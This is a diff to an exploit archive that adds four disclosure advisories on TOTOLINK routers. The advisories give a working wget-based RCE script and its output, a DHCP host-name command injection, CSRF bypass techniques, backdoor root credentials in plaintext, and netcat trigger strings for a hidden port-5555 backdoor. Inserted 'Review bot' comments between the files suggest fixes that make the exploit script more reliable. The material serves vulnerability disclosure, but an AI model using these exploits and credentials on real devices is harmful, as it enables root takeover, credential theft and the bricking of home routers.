diff --git a/files.csv b/files.csv
index 170e15f14..c66026290 100755
--- a/files.csv
+++ b/files.csv
@@ -16058,7 +16058,7 @@ id,file,description,date,author,platform,type,port
 18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0
 18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0
 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0
-18531,platforms/windows/remote/18531.html,"Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
+18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0
 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
 18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
@@ -33956,3 +33956,7 @@ id,file,description,date,author,platform,type,port
 37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
 37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
 37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
+37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple RCE Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
+37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
+37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
+37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
diff --git a/platforms/hardware/webapps/37623.txt b/platforms/hardware/webapps/37623.txt
new file mode 100755
index 000000000..7b1ea8b3a
--- /dev/null
+++ b/platforms/hardware/webapps/37623.txt
@@ -0,0 +1,378 @@ +## Advisory Information + +Title: 15 TOTOLINK router models vulnerable to multiple RCEs +Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt +Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html +Date published: 2015-07-16 +Vendors contacted: None +Release mode: 0days, Released +CVE: no current CVE + + + +## Product Description + +TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO +markets in South Korea. +TOTOLINK produces routers routers, wifi access points and network +devices. Their products are sold worldwide. + + + +## Vulnerabilities Summary + +The first vulnerability allows to bypass the admin authentication and +to get a direct RCE from the LAN side with a single HTTP request. + +The second vulnerability allows to bypass the admin authentication and +to get a direct RCE from the LAN side with a single DHCP request. + +There are direct RCEs against the routers which give a complete root +access to the embedded Linux from the LAN side. 
+ +The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to +the latest firmwares with the default configuration: + +- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin) +- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin) +- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin +- totolink.net) +- TOTOLINK EX300 : until last firmware (9.36 - +ex300_ch_9_36.bin.5357c0 - totolink.cn) +- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0) +- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin) +- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin) +- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin) +- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin) +- TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK +N302R Plus V1_en_8_82.bin) +- TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK +N302R Plus V2_en_9_08.bin) +- TOTOLINK A3004NS (no firmware available in totolinkusa.com but +ipTIME's A3004NS model was vulnerable to the 2 RCEs) +- TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0) + + +The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares +to the latest firmwares with the default configuration: + +- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin) +- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin) + + +Firmwares come from totolink.net and from totolink.cn. + +- - From my tests, it is possible to use these vulnerabilities to +overwrite the firmware with a custom (backdoored) firmware. + +Concerning the high CVSS score (10/10) of the vulnerabilities and the +longevity of this vulnerability (6+ year old), +the TOTOLINK users are urged to contact TOTOLINK. + + + +## Details - RCE with a single HTTP request + +The HTTP server allows the attacker to execute some CGI files. 
+ +Many of them are vulnerable to a command inclusion which allows to +execute commands with the http daemon user rights (root). + + +Exploit code: + +$ cat totolink.carnage +#!/bin/sh +if [ ! $1 ]; then +echo "Usage:" +echo $0 ip command +exit 1 +fi +wget -qO- --post-data="echo 'Content-type: +text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh + + +The exploits have been written in HTML/JavaScript, in form of CSRF +attacks, allowing people to test their systems in live using their +browsers: +http://pierrekim.github.io/advisories/ + + +o Listing of the filesystem + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html + +Using CLI: + +root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head +ash +auth +busybox +cat +chmod +cp +d.cgi +date +echo +false +root@kali:~/totolink# + + +o How to retrieve the credentials ? (see login and password at the end +of the text file) + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html + +Using CLI: + +kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg +wantype.wan1=dynamic +dhblock.eth1=0 +ppp_mtu=1454 +fakedns=0 +upnp=1 +ppp_mtu=1454 +timeserver=time.windows.com,gmt22,1,480,0 +wan_ifname=eth1 +auto_dns=1 +dhcp_auto_detect=0 +wireless_ifmode+wlan0=wlan0,0 +dhcpd=0 +lan_ip=192.168.1.1 +lan_netmask=255.255.255.0 +dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0 +dhcpd_dns=164.124.101.2,168.126.63.2 +dhcpd_opt=7200,30,200, +dhcpd_configfile=/etc/udhcpd.conf +dhcpd_lease_file=/etc/udhcpd.leases +dhcpd_static_lease_file=/etc/udhcpd.static +use_local_gateway=1 +login=admin +password=admin + +Login and password are stored in plaintext, which is a very bad +security practice. 
+ + +o Current running process: + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html + +Using CLI: + +kali# ./totolink.carnage 192.168.1.1 ps -auxww + + +o Getting the kernel memory: + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html + +Using CLI: + +kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore + + +o Default firewall rules: + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html + +Using CLI: + +kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL + + +o Opening the management interface on the WAN: + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html + + +o Reboot the device: + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html + + +o Brick the device: + +HTML/JS exploits: + +http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html + + +An attacker can use the /usr/bin/wget binary located in the file +system of the remote device to plant a backdoor and then execute it as +root. + +By the way, d.cgi in /bin/ is an intentional backdoor. + + + +## Details - RCE with a single DHCP request + +This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD +server in TOTOLINK devices allows remote attackers to execute +arbitrary commands +via shell metacharacters in the host-name field. + +Sending a DHCP request with this parameter will reboot the device: + +cat /etc/dhcp/dhclient.conf + +send host-name ";/sbin/reboot"; + +When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we +will see the stdout of the /dev/console device; +the dhcp request will immediately force the reboot of the remote device: + + +Booting... 
+ +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +@ +@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize +@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h +@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName +@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 +@ +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + +[...] +WiFi Simple Config v1.12 (2009.07.31-11:35+0000). + +Launch iwcontrol: wlan0 +Reaped 317 +iwcontrol RUN OK +SIGNAL -> Config Update signal progress +killall: pppoe-relay: no process killed +SIGNAL -> WAN ip changed +WAN0 IP: 192.168.2.1 +signalling START +Invalid upnpd exit +killall: upnpd: no process killed +upnpd Restart 1 +iptables: Bad rule (does a matching rule exist in that chain?) +Session Garbage Collecting:Maybe system time is updated.( 946684825 0 ) +Update Session timestamp and try it after 5 seconds again. +ez_ipupdate callback --> time_elapsed: 0 +Run DDNS by IP change: / 192.168.2.1 +Reaped 352 +iptables: Bad rule (does a matching rule exist in that chain?) +Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file +Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist +Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048 +Reaped 363 +Led Silent Callback +Turn ON All LED +Dynamic Channel Search for wlan0 is OFF +start_signal => plantynet_sync +Do start_signal => plantynet_sync +SIGNAL -> Config Update signal progress +killall: pppoe-relay: no process killed +SIGNAL -> WAN ip changed +Reaped 354 +iptables: Bad rule (does a matching rule exist in that chain?) 
+ez_ipupdate callback --> time_elapsed: 1 +Run DDNS by IP change: / 192.168.2.1 +Burst DDNS Registration is denied: iptime -> now:26 +Led Silent Callback +Turn ON All LED +/proc/sys/net/ipv4/tcp_syn_retries: cannot create +- - - ---> Plantynet Event : 00000003 +- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE + + +[sending the DHCP request] + + +[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1 +00:01:03 miniupnpd[370]: received signal 15, good-bye +Reaped 392 +Reaped 318 +Reaped 314 +Reaped 290 +Reaped 288 +Reaped 268 +Reaped 370 +Reaped 367 +- - - ---> PLANTYNET_SYNC_FREE_DEVICE +Restarting system. + +Booting... + +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +@ +@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize +@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h +@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName +@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 +@ +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Reboot Result from Watchdog Timeout! + +- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz) +Delay 1 second till reset button +Magic Number: raw_nv 00000000 +Check Firmware(05020000) : size: 0x001ddfc8 ----> + + +[...] + + +An attacker can use the /usr/bin/wget binary located in the file +system of the remote device to plant a backdoor and then execute it as +root. + + + +## Vendor Response + +Due to "un-ethical code" found in TOTOLINK products (= backdoors found +in new TOTOLINK devices), TOTOLINK was not contacted in regard of this +case, but ipTIME was contacted in April 2015 concerning the first RCE. + + + +## Report Timeline + +* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in +ipTIME products. +* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products. +* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products. 
+* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and
+EX750 routers.
+* Jul 13, 2015: Updated firmwares confirmed vulnerable.
+* Jul 16, 2015: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These vulnerabilities were found by Alexandre Torres and Pierre Kim
+(@PierreKimSec).
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
+https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
\ No newline at end of file
diff --git a/platforms/hardware/webapps/37624.txt b/platforms/hardware/webapps/37624.txt
new file mode 100755
index 000000000..99666508c
--- /dev/null
+++ b/platforms/hardware/webapps/37624.txt
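Review bot: In the totolink.carnage PoC the `PATH=$PATH:/sbin` inside the double-quoted --post-data string is expanded by the attacker's local shell, so the router receives the Kali host's PATH instead of having its own extended, and `$2 $3 $4` silently drops any command longer than three words; `if [ ! $1 ]` also only works by accident (an empty argument collapses to `[ ! ]`). Escape the dollar and forward the remaining arguments: `[ $# -lt 2 ] && { echo "Usage: $0 ip command"; exit 1; }`, `ip=$1; shift`, `wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=\$PATH:/sbin $*" "http://$ip/cgi-bin/sh"`. The default-firewall-rules example invokes `./iptime.carnage.l2.v9.52` rather than `./totolink.carnage`, presumably a leftover from the ipTIME script. The affected list has two entries named EX300 (totolink.net and totolink.cn builds), so "13 products" plus the two DHCP-only models gives 15 entries but 14 distinct model names; stating that explicitly would stop readers from looking for a missing model.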
@@ -0,0 +1,294 @@ +## Advisory Information + +Title: 4 TOTOLINK router models vulnerable to CSRF and XSS attacks +Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x01.txt +Blog URL: http://pierrekim.github.io/blog/2015-07-16-4-TOTOLINK-products-vulnerable-to-CSRF-and-XSS-attacks.html +Date published: 2015-07-16 +Vendors contacted: None +Release mode: Released, 0day +CVE: no current CVE + + + +## Product Description + +TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO +markets in South Korea. +TOTOLINK produces routers routers, wifi access points and network +devices. Their products are sold worldwide. + + + +## Vulnerability Summary + +TOTOLINK iPuppy, iPuppy3, N100RE and N200RE are wireless LAN routers. +Their current firmwares with default configuration are +vulnerable to CSRF-attacks and XSS attacks. +Since, the anti-CSRF protection is based on a static HTTP referrer +(RFC 1945), an attacker can take over +most of the configuration and settings using anyone inside the LAN of +the router. Owners are urged to +contact TOTOLINK, and activate authentication on this product +(disabled by default). + +It affects (firmware come from totolink.net and from totolink.cn): + +TOTOLINK iPuppy : firmware 1.2.1 (TOTOLINK iPuppy__V1.2.1.update) +TOTOLINK iPuppy3 : firmware 1.0.2 (TOTOLINK iPuppy3_V1.0.2.update) +TOTOLINK N100RE-V1 : firmware V1.1-B20140723-2-432-EN +(TOTOLINK-N100RE-IP04216-RT5350-SPI-1M8M-V1.1-B20140723-2-432-EN.update) +TOTOLINK N200RE : firmware V1.4-B20140724-2-457-EN +(TOTOLINK-N200RE-IP04220-MT7620-SPI-1M8M-V1.4-B20140724-2-457-EN.update) + + + +## Details - CSRF + +The HTTP interface allows to edit the configuration. This interface is +vulnerable to CSRF. + +Configuration and settings can be modified with CSRF attacks: +Activate the remote control management +Change the DNS configuration +Update the firmware +Change the Wifi Configuration +Create TCP redirections to the LAN +and more... 
+ + +Example of forms exploiting the CSRF: + + +o Activating the remote control management on port 31337/tcp listening +on the WAN interface. + + + + + + +
+ + + + + +
+ + + + +o Changing the DNS configuration to 0.2.0.7 and 1.2.0.1: + + + + + + +
+ + + + + + + + + + + + + + + + + +
+ + + + +The variable GO is an open redirect. Any URL like +http://www.google.com/ for instance can be used. +The variable GO is also vulnerable to XSS. It's out of scope in this advisory. + + +To bypass the protection (which checks the refer), you can, for +example, base64 the form and include +it in the webpage. +The refer will be empty and the CSRF will be accepted by the device: + + + +o activate_admin_wan_csrf_bypass.html: + + + + + + + + + + +Visiting activate_admin_wan_csrf_bypass.html in a remote location will activate +the remote management interface on port 31337/TCP. + +You can test it through +http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-change_dns_csrf_bypass.html + + + +o change_dns_csrf_bypass.html: + + + + + + + + + + +Visiting activate_admin_wan_csrf_bypass.html in a remote location will +change the DNS servers +provided by the TOTOLINK device in the LAN. + +You can test it through +http://pierrekim.github.io/advisories/2015-totolink-0x01-PoC-activate_admin_wan_csrf_bypass.html + + + +## Details - stored XSS and fun + +There is a stored XSS, which can be injected using UPNP from the LAN, +without authentication: + +upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping + +Required argument: +Argument Name: NewPortMappingDescription +Data Type: string +Allowed Values: [] +Set NewPortMappingDescription value to: + +Required argument: +Argument Name: NewLeaseDuration +Data Type: ui4 +Allowed Values: [] +Set NewLeaseDuration value to: 0 + +Required argument: +Argument Name: NewInternalClient +Data Type: string +Allowed Values: [] +Set NewInternalClient value to: + +Required argument: +Argument Name: NewEnabled +Data Type: boolean +Allowed Values: [] +Set NewEnabled value to: 1 + +Required argument: +Argument Name: NewExternalPort +Data Type: ui2 +Allowed Values: [] +Set NewExternalPort value to: 80 + +Required argument: +Argument Name: NewRemoteHost +Data Type: string +Allowed Values: [] +Set NewRemoteHost value to: + 
+Required argument:
+Argument Name: NewProtocol
+Data Type: string
+Allowed Values: ['TCP', 'UDP']
+Set NewProtocol value to: TCP
+
+Required argument:
+Argument Name: NewInternalPort
+Data Type: ui2
+Allowed Values: []
+Set NewInternalPort value to: 80
+
+
+upnp>
+
+
+The UPNP webpage in the administration area
+(http://192.168.0.1/popup_upnp_portmap.html) will show:
+
+[...]
+
+TCP
+21331
+:28777
+
+
+[...]
+
+
+- From my research, there are some bits overflapping with others,
+resulting in showing funny ports
+and truncating input data. A remote DoS against the upnpd process
+seems to be easily done.
+
+Gaining Remote Code Execution by UPNP exploitation is again left as a
+exercise for the reader.
+
+
+
+## Vendor Response
+
+Due to "un-ethical code" found in TOTOLINK products (= backdoors found
+in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
+case.
+
+
+
+## Report Timeline
+
+* Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices.
+* Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs.
+* Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking
+for similar ipTIME products.
+* Jul 16, 2015: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These vulnerabilities were found by Pierre Kim (@PierreKimSec).
+
+
+
+## Greetings
+
+Big thanks to Alexandre Torres.
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x01.txt
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
diff --git a/platforms/hardware/webapps/37625.txt b/platforms/hardware/webapps/37625.txt
new file mode 100755
index 000000000..3bd0a46b3
--- /dev/null
+++ b/platforms/hardware/webapps/37625.txt
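Review bot: The two "You can test it through" links are swapped: the activate_admin_wan_csrf_bypass.html section points to ...-PoC-change_dns_csrf_bypass.html and the change_dns_csrf_bypass.html section points to ...-PoC-activate_admin_wan_csrf_bypass.html, and the second section's sentence should read `Visiting change_dns_csrf_bypass.html in a remote location will change the DNS servers`. As rendered on this page the HTML form bodies (both example forms, both bypass pages and the NewPortMappingDescription XSS payload) appear only as empty lines, presumably stripped as markup, so the actual POST targets and parameter names cannot be reviewed here; the committed file should be checked to confirm they survived. The recommended mitigation, "activate authentication on this product", only raises the bar if the attack page cannot ride an existing authenticated browser session — a Referer-only check is still bypassed by the empty-Referer technique the advisory itself describes — and it does nothing for the UPnP injection, which the text says works from the LAN without authentication.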
@@ -0,0 +1,122 @@ +## Advisory Information + +Title: Backdoor credentials found in 4 TOTOLINK router models +Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x03.txt +Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-credentials-found-in-4-TOTOLINK-products.html +Date published: 2015-07-16 +Vendors contacted: None +Release mode: 0days, Released +CVE: no current CVE + + + +## Product Description + +TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO +markets in South Korea. +TOTOLINK produces routers routers, wifi access points and network +devices. Their products are sold worldwide. + + + +## Vulnerabilities Summary + +Backdoor credentials are present in several TOTOLINK products. + +It affects 4 TOTOLINK products (firmwares come from totolink.net and +from totolink.cn): + +G150R-V1 : last firmware 1.0.0-B20150330 +(TOTOLINK-G150R-V1.0.0-B20150330.1734.web) +G300R-V1 : last firmware 1.0.0-B20150330 +(TOTOLINK-G300R-V1.0.0-B20150330.1816.web) +N150RH-V1 : last firmware 1.0.0-B20131219 +(TOTOLINK-N150RH-V1.0.0-B20131219.1014.web) +N301RT-V1 : last firmware 1.0.0 (TOTOLINK N301RT_V1.0.0.web) + +It allows an attacker in the LAN to connect to the device using telnet +with 2 different accounts: root and 'onlime_r' which gives with root +privileges. + + + +## Details - G150R-V1 and G300R-V1 + +The init.d script executes these commands when the router starts: + +[...] +cp /etc/passwd_orig /var/passwd +cp /etc/group_orig /var/group +telnetd& +[...] + + +The /etc/passwd_orig contains backdoor credentials: + +root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh +onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh +nobody:x:0:0:nobody:/:/dev/null + +The corresponding passwords are: + +root:12345 +onlime_r:12345 + + +## Details - N150RH-V1 and N301RT + +The init.d script executes these commands when the router starts: + +[...] +#start telnetd +telnetd& +[...] 
+
+The binary /bin/sysconf executes these commands when the router starts:
+
+system("cp /etc/passwd.org /var/passwd 2> /dev/null")
+
+
+The /etc/passwd.org contains backdoor credentials:
+
+root:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
+onlime_r:$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/:0:0:root:/:/bin/sh
+nobody:x:0:0:nobody:/:/dev/null
+
+The corresponding passwords are:
+
+root:12345
+onlime_r:12345
+
+
+
+## Vendor Response
+
+TOTOLINK was not contacted in regard of this case.
+
+
+
+## Report Timeline
+
+* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
+* Jun 26, 2015: working PoCs.
+* Jul 16, 2015: A public advisory is sent to security mailing lists.
+
+
+
+## Credit
+
+These backdoor credentials were found Pierre Kim (@PierreKimSec).
+
+
+
+## References
+
+https://pierrekim.github.io/advisories/2015-totolink-0x03.txt
+
+
+
+## Disclaimer
+
+This advisory is licensed under a Creative Commons Attribution Non-Commercial
+Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
\ No newline at end of file
diff --git a/platforms/hardware/webapps/37626.txt b/platforms/hardware/webapps/37626.txt
new file mode 100755
index 000000000..11f8e3204
--- /dev/null
+++ b/platforms/hardware/webapps/37626.txt
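Review bot: The passwd entries say more than "two accounts with root privileges": `onlime_r` is given UID 0 and GID 0 (`:0:0:`) outright, so it is root by UID, and the summary's garbled "which gives with root privileges" should read `root and 'onlime_r', both UID 0 (root)`; the `nobody:x:0:0` line is also UID 0, which is worth calling out even though its `x` field makes it unusable without a shadow entry. Both accounts share one MD5-crypt hash with salt `01OyWDBw`, so a reader can confirm the claimed password offline with `openssl passwd -1 -salt 01OyWDBw 12345` and compare it to `$1$01OyWDBw$Hrxb2t.LtmiiJD49OBsCU/`. Since telnetd is started unconditionally from init.d and the shipped passwd file is copied over /var/passwd on every boot, changing the web-UI admin password presumably leaves these accounts untouched — the advisory should say so, and note that blocking 23/tcp on the LAN side or a firmware fix are the only mitigations, if that is confirmed.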
@@ -0,0 +1,199 @@ +## Advisory Information + +Title: Backdoor and RCE found in 8 TOTOLINK router models +Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt +Blog URL: https://pierrekim.github.io/blog/2015-07-16-backdoor-and-RCE-found-in-8-TOTOLINK-products.html +Date published: 2015-07-16 +Vendors contacted: None +Release mode: 0days, Released +CVE: no current CVE + + + +## Product Description + +TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO +markets in South Korea. +TOTOLINK produces routers routers, wifi access points and network +devices. Their products are sold worldwide. + + + +## Vulnerabilities Summary + +A backdoor is present in several TOTOLINK products. +This was confirmed by analysing the latest firmwares and by testing +the backdoor against live routers. + +At least 8 TOTOLINK products are affected (firmwares come from +totolink.net and from totolink.cn): + + - A850R-V1 : until last firwmware TOTOLINK-A850R-V1.0.1-B20150707.1612.web + - F1-V2 : until last firmware F1-V2.1.1-B20150708.1646.web + - F2-V1 : until last firmware F2-V2.1.0-B20150320.1611.web + - N150RT-V2 : until last firmware TOTOLINK-N150RT-V2.1.1-B20150708.1548.web + - N151RT-V2 : until last firmware TOTOLINK-N151RT-V2.1.1-B20150708.1559.web + - N300RH-V2 : until last firmware TOTOLINK-N300RH-V2.0.1-B20150708.1625.web + - N300RH-V3 : until last firmware TOTOLINK-N300RH-V3.0.0-B20150331.0858.web + - N300RT-V2 : until last firmware TOTOLINK-N300RT-V2.1.1-B20150708.1613.web + + +By sending a crafted request to the WAN IP, an attacker will open the +HTTP remote management interface on the Internet. +Then an attacker can use a Remote Code Execution in the HTTP remote +management interface by using the hidden /boafrm/formSysCmd form, +bypassing the authentication system. + +We estimate there are =~ 50 000 routers affected by this backdoor. 
+ + + +## Details - backdoor + +The init.d script executes the /bin/skt binary when the router starts: + + cat etc/init.d/rcS + [...] + # start web server + boa + skt& + + +skt is a small MIPS binary which is a client/server program. The arguments are: + + server: ./skt + client: ./skt host cmd + + +The binary can be used in x86_64 machines using QEMU: sudo chroot . +./qemu-mips-static ./bin/skt + +Using skt without argument will launch a TCP daemon on port 5555 in +every interface (including WAN), acting as an ECHO server. +Using skt with arguments will send a TCP packet containing the command +to the specified IP on port 5555. + +The analysis of the binary running on the TOTOLINK devices (for more +details, read +https://pierrekim.github.io/blog/2015-07-XX-backdoor-in-TOTOLINK-products.html +) shows the server mode responds to 3 commands by silently executing +system() in the background: + + + o By sending "hel,xasf" to the device, the device will execute: +iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT + + This will open the HTTP remote management interface on port 80 in +the eth1 interface which is the WAN interface by default. + + + o By sending "oki,xasf" to the device, the device will execute: +iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT + + This will close the HTTP remote management interface. + + + o By sending "bye,xasf" to the device, the device will do nothing + + +The iptables commands in the backdoor are hardcoded with "eth1". +Only devices using DHCP and static IP connections are affected because +the WAN IP is attached on the eth1 device. 
+ +It does not affect devices using PPPoE connections, because the WAN IP +is attached on the ppp device, as seen below: + +totolink# ifconfig +ppp0 Link encap:Point-to-Point Protocol + inet addr:X.X.X.X P-t-P:X.X.X.X Mask:255.255.255.255 + UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1438 Metric:1 + RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0 + TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:64 + RX bytes:2803138455 (2.6 GiB) TX bytes:277402492 (264.5 MiB) + + + +An attacker can use these simple netcat commands to test the backdoor: + +To open the HTTP remote management interface on the Internet: + + echo -ne "hel,xasf" | nc 5555 + +To close the HTTP remote management interface on the Internet: + + echo -ne "oki,xasf" | nc 5555 + +To detect a vulnerable router: + + echo -ne "GET / HTTP/1.1" | nc 5555 + + if you see "GET / HTTP/1.1" in the answer, you likely detected a +vulnerable router. + + +## Details - RCE in the management interface + +A hidden form in the latest firmware allows an attacker to execute +commands as root by sending a HTTP request: + + + POST /boafrm/formSysCmd HTTP/1.1 + + sysCmd=&apply=Apply&msg= + + +An attacker can use wget to execute commands in the remote device: + + wget --post-data='sysCmd=&apply=Apply&msg=' +http://ip//boafrm/formSysCmd + + +For instance, sending this HTTP request to the management interface +will reboot the device: + + + POST /boafrm/formSysCmd HTTP/1.1 + + sysCmd=reboot&apply=Apply&msg= + +This wget command will do the same job: + + wget --post-data='sysCmd=reboot&apply=Apply&msg=' +http://ip//boafrm/formSysCmd + + + +## Vendor Response + +TOTOLINK was not contacted in regard of this case. + + + +## Report Timeline + +* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares. +* Jun 26, 2015: Working PoCs with RCE. +* Jul 13, 2015: Updated firmwares confirmed vulnerable. +* Jul 16, 2015: A public advisory is sent to security mailing lists. 
+
+
+
+## Credit
+
+These vulnerabilities were found by Alexandre Torres and Pierre Kim
